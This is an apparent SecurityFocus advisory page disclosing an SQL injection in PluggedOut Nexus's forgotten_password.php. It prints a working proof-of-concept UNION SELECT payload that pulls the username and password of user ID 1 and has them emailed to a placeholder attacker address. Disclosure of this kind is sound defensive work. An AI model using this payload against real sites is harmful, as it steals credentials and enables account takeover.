Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PluggedOut Nexus forgotten_password.PHP SQL Injection Vulnerability


This issue can be exploited using a web client.

The following proof of concept exploit is available:
Insert this code in E-Mail Address form (http://www.example.com/Nexus/forgotten_password.php) :
hamidnetworksecurityteam' union select
cUsername,cPassword,'ATTACKER@EMAIL.ADDRESS' from
nexus_users WHERE nUserId=1 and '1'='1

This will email the password for userID=1 to ATTACKER@EMAIL.ADDRESS.







 

Privacy Statement
Copyright 2009, SecurityFocus